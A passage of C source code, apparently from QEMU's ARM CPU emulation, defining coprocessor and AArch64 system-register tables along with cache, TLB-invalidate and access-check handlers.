NOP these * and hope the guest does not really rely on cache behaviour. */ { .name = "XSCALE_LOCK_ICACHE_LINE", .cp = 15, .opc1 = 0, .crn = 9, .crm = 1, .opc2 = 0, .access = PL1_W, .type = ARM_CP_NOP }, { .name = "XSCALE_UNLOCK_ICACHE", .cp = 15, .opc1 = 0, .crn = 9, .crm = 1, .opc2 = 1, .access = PL1_W, .type = ARM_CP_NOP }, { .name = "XSCALE_DCACHE_LOCK", .cp = 15, .opc1 = 0, .crn = 9, .crm = 2, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_NOP }, { .name = "XSCALE_UNLOCK_DCACHE", .cp = 15, .opc1 = 0, .crn = 9, .crm = 2, .opc2 = 1, .access = PL1_W, .type = ARM_CP_NOP }, REGINFO_SENTINEL }; static const ARMCPRegInfo dummy_c15_cp_reginfo[] = { /* RAZ/WI the whole crn=15 space, when we don't have a more specific * implementation of this implementation-defined space. * Ideally this should eventually disappear in favour of actually * implementing the correct behaviour for all cores. */ { .name = "C15_IMPDEF", .cp = 15, .crn = 15, .crm = CP_ANY, .opc1 = CP_ANY, .opc2 = CP_ANY, .access = PL1_RW, .type = ARM_CP_CONST | ARM_CP_NO_RAW | ARM_CP_OVERRIDE, .resetvalue = 0 }, REGINFO_SENTINEL }; static const ARMCPRegInfo cache_dirty_status_cp_reginfo[] = { /* Cache status: RAZ because we have no cache so it's always clean */ { .name = "CDSR", .cp = 15, .crn = 7, .crm = 10, .opc1 = 0, .opc2 = 6, .access = PL1_R, .type = ARM_CP_CONST | ARM_CP_NO_RAW, .resetvalue = 0 }, REGINFO_SENTINEL }; static const ARMCPRegInfo cache_block_ops_cp_reginfo[] = { /* We never have a a block transfer operation in progress */ { .name = "BXSR", .cp = 15, .crn = 7, .crm = 12, .opc1 = 0, .opc2 = 4, .access = PL0_R, .type = ARM_CP_CONST | ARM_CP_NO_RAW, .resetvalue = 0 }, /* The cache ops themselves: these all NOP for QEMU */ { .name = "IICR", .cp = 15, .crm = 5, .opc1 = 0, .access = PL1_W, .type = ARM_CP_NOP|ARM_CP_64BIT }, { .name = "IDCR", .cp = 15, .crm = 6, .opc1 = 0, .access = PL1_W, .type = ARM_CP_NOP|ARM_CP_64BIT }, { .name = "CDCR", .cp = 15, .crm = 12, .opc1 = 0, .access = PL0_W, .type = ARM_CP_NOP|ARM_CP_64BIT }, { .name = "PIR", .cp = 15, .crm = 12, .opc1 = 1, .access = PL0_W, .type = ARM_CP_NOP|ARM_CP_64BIT }, { .name = "PDR", .cp = 15, .crm = 12, .opc1 = 2, .access = PL0_W, .type = ARM_CP_NOP|ARM_CP_64BIT }, { .name = "CIDCR", .cp = 15, .crm = 14, .opc1 = 0, .access = PL1_W, .type = ARM_CP_NOP|ARM_CP_64BIT }, REGINFO_SENTINEL }; static const ARMCPRegInfo cache_test_clean_cp_reginfo[] = { /* The cache test-and-clean instructions always return (1 << 30) * to indicate that there are no dirty cache lines. */ { .name = "TC_DCACHE", .cp = 15, .crn = 7, .crm = 10, .opc1 = 0, .opc2 = 3, .access = PL0_R, .type = ARM_CP_CONST | ARM_CP_NO_RAW, .resetvalue = (1 << 30) }, { .name = "TCI_DCACHE", .cp = 15, .crn = 7, .crm = 14, .opc1 = 0, .opc2 = 3, .access = PL0_R, .type = ARM_CP_CONST | ARM_CP_NO_RAW, .resetvalue = (1 << 30) }, REGINFO_SENTINEL }; static const ARMCPRegInfo strongarm_cp_reginfo[] = { /* Ignore ReadBuffer accesses */ { .name = "C9_READBUFFER", .cp = 15, .crn = 9, .crm = CP_ANY, .opc1 = CP_ANY, .opc2 = CP_ANY, .access = PL1_RW, .resetvalue = 0, .type = ARM_CP_CONST | ARM_CP_OVERRIDE | ARM_CP_NO_RAW }, REGINFO_SENTINEL }; static uint64_t midr_read(CPUARMState *env, const ARMCPRegInfo *ri) { ARMCPU *cpu = env_archcpu(env); unsigned int cur_el = arm_current_el(env); bool secure = arm_is_secure(env); if (arm_feature(&cpu->env, ARM_FEATURE_EL2) && !secure && cur_el == 1) { return env->cp15.vpidr_el2; } return raw_read(env, ri); } static uint64_t mpidr_read_val(CPUARMState *env) { ARMCPU *cpu = env_archcpu(env); uint64_t mpidr = cpu->mp_affinity; if (arm_feature(env, ARM_FEATURE_V7MP)) { mpidr |= (1U << 31); /* Cores which are uniprocessor (non-coherent) * but still implement the MP extensions set * bit 30. (For instance, Cortex-R5). */ if (cpu->mp_is_up) { mpidr |= (1u << 30); } } return mpidr; } static uint64_t mpidr_read(CPUARMState *env, const ARMCPRegInfo *ri) { unsigned int cur_el = arm_current_el(env); bool secure = arm_is_secure(env); if (arm_feature(env, ARM_FEATURE_EL2) && !secure && cur_el == 1) { return env->cp15.vmpidr_el2; } return mpidr_read_val(env); } static const ARMCPRegInfo lpae_cp_reginfo[] = { /* NOP AMAIR0/1 */ { .name = "AMAIR0", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .crn = 10, .crm = 3, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .type = ARM_CP_CONST, .resetvalue = 0 }, /* AMAIR1 is mapped to AMAIR_EL1[63:32] */ { .name = "AMAIR1", .cp = 15, .crn = 10, .crm = 3, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .accessfn = access_tvm_trvm, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "PAR", .cp = 15, .crm = 7, .opc1 = 0, .access = PL1_RW, .type = ARM_CP_64BIT, .resetvalue = 0, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.par_s), offsetof(CPUARMState, cp15.par_ns)} }, { .name = "TTBR0", .cp = 15, .crm = 2, .opc1 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .type = ARM_CP_64BIT | ARM_CP_ALIAS, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.ttbr0_s), offsetof(CPUARMState, cp15.ttbr0_ns) }, .writefn = vmsa_ttbr_write, }, { .name = "TTBR1", .cp = 15, .crm = 2, .opc1 = 1, .access = PL1_RW, .accessfn = access_tvm_trvm, .type = ARM_CP_64BIT | ARM_CP_ALIAS, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.ttbr1_s), offsetof(CPUARMState, cp15.ttbr1_ns) }, .writefn = vmsa_ttbr_write, }, REGINFO_SENTINEL }; static uint64_t aa64_fpcr_read(CPUARMState *env, const ARMCPRegInfo *ri) { return vfp_get_fpcr(env); } static void aa64_fpcr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { vfp_set_fpcr(env, value); } static uint64_t aa64_fpsr_read(CPUARMState *env, const ARMCPRegInfo *ri) { return vfp_get_fpsr(env); } static void aa64_fpsr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { vfp_set_fpsr(env, value); } static CPAccessResult aa64_daif_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 0 && !(arm_sctlr(env, 0) & SCTLR_UMA)) { return CP_ACCESS_TRAP; } return CP_ACCESS_OK; } static void aa64_daif_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { env->daif = value & PSTATE_DAIF; } static uint64_t aa64_pan_read(CPUARMState *env, const ARMCPRegInfo *ri) { return env->pstate & PSTATE_PAN; } static void aa64_pan_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { env->pstate = (env->pstate & ~PSTATE_PAN) | (value & PSTATE_PAN); } static const ARMCPRegInfo pan_reginfo = { .name = "PAN", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 4, .crm = 2, .opc2 = 3, .type = ARM_CP_NO_RAW, .access = PL1_RW, .readfn = aa64_pan_read, .writefn = aa64_pan_write }; static uint64_t aa64_uao_read(CPUARMState *env, const ARMCPRegInfo *ri) { return env->pstate & PSTATE_UAO; } static void aa64_uao_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { env->pstate = (env->pstate & ~PSTATE_UAO) | (value & PSTATE_UAO); } static const ARMCPRegInfo uao_reginfo = { .name = "UAO", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 4, .crm = 2, .opc2 = 4, .type = ARM_CP_NO_RAW, .access = PL1_RW, .readfn = aa64_uao_read, .writefn = aa64_uao_write }; static CPAccessResult aa64_cacheop_poc_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* Cache invalidate/clean to Point of Coherency or Persistence... */ switch (arm_current_el(env)) { case 0: /* ... EL0 must UNDEF unless SCTLR_EL1.UCI is set. */ if (!(arm_sctlr(env, 0) & SCTLR_UCI)) { return CP_ACCESS_TRAP; } /* fall through */ case 1: /* ... EL1 must trap to EL2 if HCR_EL2.TPCP is set. */ if (arm_hcr_el2_eff(env) & HCR_TPCP) { return CP_ACCESS_TRAP_EL2; } break; } return CP_ACCESS_OK; } static CPAccessResult aa64_cacheop_pou_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* Cache invalidate/clean to Point of Unification... */ switch (arm_current_el(env)) { case 0: /* ... EL0 must UNDEF unless SCTLR_EL1.UCI is set. */ if (!(arm_sctlr(env, 0) & SCTLR_UCI)) { return CP_ACCESS_TRAP; } /* fall through */ case 1: /* ... EL1 must trap to EL2 if HCR_EL2.TPU is set. */ if (arm_hcr_el2_eff(env) & HCR_TPU) { return CP_ACCESS_TRAP_EL2; } break; } return CP_ACCESS_OK; } /* See: D4.7.2 TLB maintenance requirements and the TLB maintenance instructions * Page D4-1736 (DDI0487A.b) */ static int vae1_tlbmask(CPUARMState *env) { /* Since we exclude secure first, we may read HCR_EL2 directly. */ if (arm_is_secure_below_el3(env)) { return ARMMMUIdxBit_SE10_1 | ARMMMUIdxBit_SE10_1_PAN | ARMMMUIdxBit_SE10_0; } else if ((env->cp15.hcr_el2 & (HCR_E2H | HCR_TGE)) == (HCR_E2H | HCR_TGE)) { return ARMMMUIdxBit_E20_2 | ARMMMUIdxBit_E20_2_PAN | ARMMMUIdxBit_E20_0; } else { return ARMMMUIdxBit_E10_1 | ARMMMUIdxBit_E10_1_PAN | ARMMMUIdxBit_E10_0; } } static void tlbi_aa64_vmalle1is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); int mask = vae1_tlbmask(env); tlb_flush_by_mmuidx_all_cpus_synced(cs, mask); } static void tlbi_aa64_vmalle1_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); int mask = vae1_tlbmask(env); if (tlb_force_broadcast(env)) { tlb_flush_by_mmuidx_all_cpus_synced(cs, mask); } else { tlb_flush_by_mmuidx(cs, mask); } } static int alle1_tlbmask(CPUARMState *env) { /* * Note that the 'ALL' scope must invalidate both stage 1 and * stage 2 translations, whereas most other scopes only invalidate * stage 1 translations. */ if (arm_is_secure_below_el3(env)) { return ARMMMUIdxBit_SE10_1 | ARMMMUIdxBit_SE10_1_PAN | ARMMMUIdxBit_SE10_0; } else if (arm_feature(env, ARM_FEATURE_EL2)) { return ARMMMUIdxBit_E10_1 | ARMMMUIdxBit_E10_1_PAN | ARMMMUIdxBit_E10_0 | ARMMMUIdxBit_Stage2; } else { return ARMMMUIdxBit_E10_1 | ARMMMUIdxBit_E10_1_PAN | ARMMMUIdxBit_E10_0; } } static int e2_tlbmask(CPUARMState *env) { /* TODO: ARMv8.4-SecEL2 */ return ARMMMUIdxBit_E20_0 | ARMMMUIdxBit_E20_2 | ARMMMUIdxBit_E20_2_PAN | ARMMMUIdxBit_E2; } static void tlbi_aa64_alle1_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); int mask = alle1_tlbmask(env); tlb_flush_by_mmuidx(cs, mask); } static void tlbi_aa64_alle2_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); int mask = e2_tlbmask(env); tlb_flush_by_mmuidx(cs, mask); } static void tlbi_aa64_alle3_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); CPUState *cs = CPU(cpu); tlb_flush_by_mmuidx(cs, ARMMMUIdxBit_SE3); } static void tlbi_aa64_alle1is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); int mask = alle1_tlbmask(env); tlb_flush_by_mmuidx_all_cpus_synced(cs, mask); } static void tlbi_aa64_alle2is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); int mask = e2_tlbmask(env); tlb_flush_by_mmuidx_all_cpus_synced(cs, mask); } static void tlbi_aa64_alle3is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); tlb_flush_by_mmuidx_all_cpus_synced(cs, ARMMMUIdxBit_SE3); } static void tlbi_aa64_vae2_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Invalidate by VA, EL2 * Currently handles both VAE2 and VALE2, since we don't support * flush-last-level-only. */ CPUState *cs = env_cpu(env); int mask = e2_tlbmask(env); uint64_t pageaddr = sextract64(value << 12, 0, 56); tlb_flush_page_by_mmuidx(cs, pageaddr, mask); } static void tlbi_aa64_vae3_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Invalidate by VA, EL3 * Currently handles both VAE3 and VALE3, since we don't support * flush-last-level-only. */ ARMCPU *cpu = env_archcpu(env); CPUState *cs = CPU(cpu); uint64_t pageaddr = sextract64(value << 12, 0, 56); tlb_flush_page_by_mmuidx(cs, pageaddr, ARMMMUIdxBit_SE3); } static void tlbi_aa64_vae1is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); int mask = vae1_tlbmask(env); uint64_t pageaddr = sextract64(value << 12, 0, 56); tlb_flush_page_by_mmuidx_all_cpus_synced(cs, pageaddr, mask); } static void tlbi_aa64_vae1_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Invalidate by VA, EL1&0 (AArch64 version). * Currently handles all of VAE1, VAAE1, VAALE1 and VALE1, * since we don't support flush-for-specific-ASID-only or * flush-last-level-only. */ CPUState *cs = env_cpu(env); int mask = vae1_tlbmask(env); uint64_t pageaddr = sextract64(value << 12, 0, 56); if (tlb_force_broadcast(env)) { tlb_flush_page_by_mmuidx_all_cpus_synced(cs, pageaddr, mask); } else { tlb_flush_page_by_mmuidx(cs, pageaddr, mask); } } static void tlbi_aa64_vae2is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); uint64_t pageaddr = sextract64(value << 12, 0, 56); tlb_flush_page_by_mmuidx_all_cpus_synced(cs, pageaddr, ARMMMUIdxBit_E2); } static void tlbi_aa64_vae3is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); uint64_t pageaddr = sextract64(value << 12, 0, 56); tlb_flush_page_by_mmuidx_all_cpus_synced(cs, pageaddr, ARMMMUIdxBit_SE3); } static void tlbi_aa64_ipas2e1_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Invalidate by IPA. This has to invalidate any structures that * contain only stage 2 translation information, but does not need * to apply to structures that contain combined stage 1 and stage 2 * translation information. * This must NOP if EL2 isn't implemented or SCR_EL3.NS is zero. */ ARMCPU *cpu = env_archcpu(env); CPUState *cs = CPU(cpu); uint64_t pageaddr; if (!arm_feature(env, ARM_FEATURE_EL2) || !(env->cp15.scr_el3 & SCR_NS)) { return; } pageaddr = sextract64(value << 12, 0, 48); tlb_flush_page_by_mmuidx(cs, pageaddr, ARMMMUIdxBit_Stage2); } static void tlbi_aa64_ipas2e1is_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { CPUState *cs = env_cpu(env); uint64_t pageaddr; if (!arm_feature(env, ARM_FEATURE_EL2) || !(env->cp15.scr_el3 & SCR_NS)) { return; } pageaddr = sextract64(value << 12, 0, 48); tlb_flush_page_by_mmuidx_all_cpus_synced(cs, pageaddr, ARMMMUIdxBit_Stage2); } static CPAccessResult aa64_zva_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { int cur_el = arm_current_el(env); if (cur_el < 2) { uint64_t hcr = arm_hcr_el2_eff(env); if (cur_el == 0) { if ((hcr & (HCR_E2H | HCR_TGE)) == (HCR_E2H | HCR_TGE)) { if (!(env->cp15.sctlr_el[2] & SCTLR_DZE)) { return CP_ACCESS_TRAP_EL2; } } else { if (!(env->cp15.sctlr_el[1] & SCTLR_DZE)) { return CP_ACCESS_TRAP; } if (hcr & HCR_TDZ) { return CP_ACCESS_TRAP_EL2; } } } else if (hcr & HCR_TDZ) { return CP_ACCESS_TRAP_EL2; } } return CP_ACCESS_OK; } static uint64_t aa64_dczid_read(CPUARMState *env, const ARMCPRegInfo *ri) { ARMCPU *cpu = env_archcpu(env); int dzp_bit = 1 << 4; /* DZP indicates whether DC ZVA access is allowed */ if (aa64_zva_access(env, NULL, false) == CP_ACCESS_OK) { dzp_bit = 0; } return cpu->dcz_blocksize | dzp_bit; } static CPAccessResult sp_el0_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (!(env->pstate & PSTATE_SP)) { /* Access to SP_EL0 is undefined if it's being used as * the stack pointer. */ return CP_ACCESS_TRAP_UNCATEGORIZED; } return CP_ACCESS_OK; } static uint64_t spsel_read(CPUARMState *env, const ARMCPRegInfo *ri) { return env->pstate & PSTATE_SP; } static void spsel_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t val) { update_spsel(env, val); } static void sctlr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); if (raw_read(env, ri) == value) { /* Skip the TLB flush if nothing actually changed; Linux likes * to do a lot of pointless SCTLR writes. */ return; } if (arm_feature(env, ARM_FEATURE_PMSA) && !cpu->has_mpu) { /* M bit is RAZ/WI for PMSA with no MPU implemented */ value &= ~SCTLR_M; } raw_write(env, ri, value); /* ??? Lots of these bits are not implemented. */ /* This may enable/disable the MMU, so do a TLB flush. */ tlb_flush(CPU(cpu)); if (ri->type & ARM_CP_SUPPRESS_TB_END) { /* * Normally we would always end the TB on an SCTLR write; see the * comment in ARMCPRegInfo sctlr initialization below for why Xscale * is special. Setting ARM_CP_SUPPRESS_TB_END also stops the rebuild * of hflags from the translator, so do it here. */ arm_rebuild_hflags(env); } } static CPAccessResult fpexc32_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if ((env->cp15.cptr_el[2] & CPTR_TFP) && arm_current_el(env) == 2) { return CP_ACCESS_TRAP_FP_EL2; } if (env->cp15.cptr_el[3] & CPTR_TFP) { return CP_ACCESS_TRAP_FP_EL3; } return CP_ACCESS_OK; } static void sdcr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { env->cp15.mdcr_el3 = value & SDCR_VALID_MASK; } static const ARMCPRegInfo v8_cp_reginfo[] = { /* Minimal set of EL0-visible registers. This will need to be expanded * significantly for system emulation of AArch64 CPUs. */ { .name = "NZCV", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .opc2 = 0, .crn = 4, .crm = 2, .access = PL0_RW, .type = ARM_CP_NZCV }, { .name = "DAIF", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .opc2 = 1, .crn = 4, .crm = 2, .type = ARM_CP_NO_RAW, .access = PL0_RW, .accessfn = aa64_daif_access, .fieldoffset = offsetof(CPUARMState, daif), .writefn = aa64_daif_write, .resetfn = arm_cp_reset_ignore }, { .name = "FPCR", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .opc2 = 0, .crn = 4, .crm = 4, .access = PL0_RW, .type = ARM_CP_FPU | ARM_CP_SUPPRESS_TB_END, .readfn = aa64_fpcr_read, .writefn = aa64_fpcr_write }, { .name = "FPSR", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .opc2 = 1, .crn = 4, .crm = 4, .access = PL0_RW, .type = ARM_CP_FPU | ARM_CP_SUPPRESS_TB_END, .readfn = aa64_fpsr_read, .writefn = aa64_fpsr_write }, { .name = "DCZID_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .opc2 = 7, .crn = 0, .crm = 0, .access = PL0_R, .type = ARM_CP_NO_RAW, .readfn = aa64_dczid_read }, { .name = "DC_ZVA", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 3, .crn = 7, .crm = 4, .opc2 = 1, .access = PL0_W, .type = ARM_CP_DC_ZVA, /* Avoid overhead of an access check that always passes in user-mode */ .accessfn = aa64_zva_access, }, { .name = "CURRENTEL", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .opc2 = 2, .crn = 4, .crm = 2, .access = PL1_R, .type = ARM_CP_CURRENTEL }, /* Cache ops: all NOPs since we don't emulate caches */ { .name = "IC_IALLUIS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 1, .opc2 = 0, .access = PL1_W, .type = ARM_CP_NOP, .accessfn = aa64_cacheop_pou_access }, { .name = "IC_IALLU", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 5, .opc2 = 0, .access = PL1_W, .type = ARM_CP_NOP, .accessfn = aa64_cacheop_pou_access }, { .name = "IC_IVAU", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 3, .crn = 7, .crm = 5, .opc2 = 1, .access = PL0_W, .type = ARM_CP_NOP, .accessfn = aa64_cacheop_pou_access }, { .name = "DC_IVAC", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 6, .opc2 = 1, .access = PL1_W, .accessfn = aa64_cacheop_poc_access, .type = ARM_CP_NOP }, { .name = "DC_ISW", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 6, .opc2 = 2, .access = PL1_W, .accessfn = access_tsw, .type = ARM_CP_NOP }, { .name = "DC_CVAC", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 3, .crn = 7, .crm = 10, .opc2 = 1, .access = PL0_W, .type = ARM_CP_NOP, .accessfn = aa64_cacheop_poc_access }, { .name = "DC_CSW", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 10, .opc2 = 2, .access = PL1_W, .accessfn = access_tsw, .type = ARM_CP_NOP }, { .name = "DC_CVAU", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 3, .crn = 7, .crm = 11, .opc2 = 1, .access = PL0_W, .type = ARM_CP_NOP, .accessfn = aa64_cacheop_pou_access }, { .name = "DC_CIVAC", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 3, .crn = 7, .crm = 14, .opc2 = 1, .access = PL0_W, .type = ARM_CP_NOP, .accessfn = aa64_cacheop_poc_access }, { .name = "DC_CISW", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 14, .opc2 = 2, .access = PL1_W, .accessfn = access_tsw, .type = ARM_CP_NOP }, /* TLBI operations */ { .name = "TLBI_VMALLE1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 0, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vmalle1is_write }, { .name = "TLBI_VAE1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 1, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae1is_write }, { .name = "TLBI_ASIDE1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 2, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vmalle1is_write }, { .name = "TLBI_VAAE1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 3, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae1is_write }, { .name = "TLBI_VALE1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 5, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae1is_write }, { .name = "TLBI_VAALE1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 7, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae1is_write }, { .name = "TLBI_VMALLE1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 0, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vmalle1_write }, { .name = "TLBI_VAE1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 1, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae1_write }, { .name = "TLBI_ASIDE1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 2, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vmalle1_write }, { .name = "TLBI_VAAE1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 3, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae1_write }, { .name = "TLBI_VALE1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 5, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae1_write }, { .name = "TLBI_VAALE1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 7, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae1_write }, { .name = "TLBI_IPAS2E1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 0, .opc2 = 1, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_ipas2e1is_write }, { .name = "TLBI_IPAS2LE1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 0, .opc2 = 5, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_ipas2e1is_write }, { .name = "TLBI_ALLE1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 3, .opc2 = 4, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_alle1is_write }, { .name = "TLBI_VMALLS12E1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 3, .opc2 = 6, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_alle1is_write }, { .name = "TLBI_IPAS2E1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 4, .opc2 = 1, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_ipas2e1_write }, { .name = "TLBI_IPAS2LE1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 4, .opc2 = 5, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_ipas2e1_write }, { .name = "TLBI_ALLE1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 7, .opc2 = 4, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_alle1_write }, { .name = "TLBI_VMALLS12E1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 7, .opc2 = 6, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_alle1is_write }, /* 64 bit address translation operations */ { .name = "AT_S1E1R", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 8, .opc2 = 0, .access = PL1_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "AT_S1E1W", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 8, .opc2 = 1, .access = PL1_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "AT_S1E0R", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 8, .opc2 = 2, .access = PL1_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "AT_S1E0W", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 8, .opc2 = 3, .access = PL1_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "AT_S12E1R", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 7, .crm = 8, .opc2 = 4, .access = PL2_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = 